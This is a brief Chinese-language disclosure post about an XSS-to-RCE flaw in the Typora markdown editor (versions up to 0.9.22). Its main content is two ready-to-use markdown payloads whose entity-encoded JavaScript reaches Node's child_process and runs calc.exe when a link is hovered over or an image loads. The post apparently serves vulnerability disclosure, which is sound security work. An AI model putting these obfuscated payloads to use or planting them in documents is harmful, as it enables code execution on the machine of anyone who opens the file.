Typora <= 0.9.22 XSS to RCE

author: Dlive

看到 https://zhuanlan.zhihu.com/p/51768716 这个洞,想到自己和@71之前挖的Typora 0.9.22上的XSS to RCE,时间过去很久了就直接发出来吧。

Typora没有什么安全奖励计划,就只给官方发了一个邮件,对方表示感谢。现在想想可能可以水个CVE。

payload1:

1
[click](' onmouseover=&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#116;&#111;&#112;&#46;&#114;&#101;&#113;&#117;&#105;&#114;&#101;&#40;&#39;&#99;&#104;&#105;&#108;&#100;&#95;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#39;&#41;&#46;&#101;&#120;&#101;&#99;&#70;&#105;&#108;&#101;&#40;&#39;&#67;&#58;&#47;&#87;&#105;&#110;&#100;&#111;&#119;&#115;&#47;&#83;&#121;&#115;&#116;&#101;&#109;&#51;&#50;&#47;&#99;&#97;&#108;&#99;&#46;&#101;&#120;&#101;&#39;&#44;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#40;&#101;&#114;&#114;&#111;&#114;&#44;&#32;&#115;&#116;&#100;&#111;&#117;&#116;&#44;&#32;&#115;&#116;&#100;&#101;&#114;&#114;&#41;&#123;&#125;&#41;&#59;//)

payload2:

1
![img](http://dlive.me//css/images/banner4.jpg' onload=&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#116;&#111;&#112;&#46;&#114;&#101;&#113;&#117;&#105;&#114;&#101;&#40;&#39;&#99;&#104;&#105;&#108;&#100;&#95;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#39;&#41;&#46;&#101;&#120;&#101;&#99;&#70;&#105;&#108;&#101;&#40;&#39;&#67;&#58;&#47;&#87;&#105;&#110;&#100;&#111;&#119;&#115;&#47;&#83;&#121;&#115;&#116;&#101;&#109;&#51;&#50;&#47;&#99;&#97;&#108;&#99;&#46;&#101;&#120;&#101;&#39;&#44;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#40;&#101;&#114;&#114;&#111;&#114;&#44;&#32;&#115;&#116;&#100;&#111;&#117;&#116;&#44;&#32;&#115;&#116;&#100;&#101;&#114;&#114;&#41;&#123;&#125;&#41;&#59;//>)

弹框,xss在file域,Typora Mac用的不是Electron但可以读本地文件

Windows上结合Electron RCE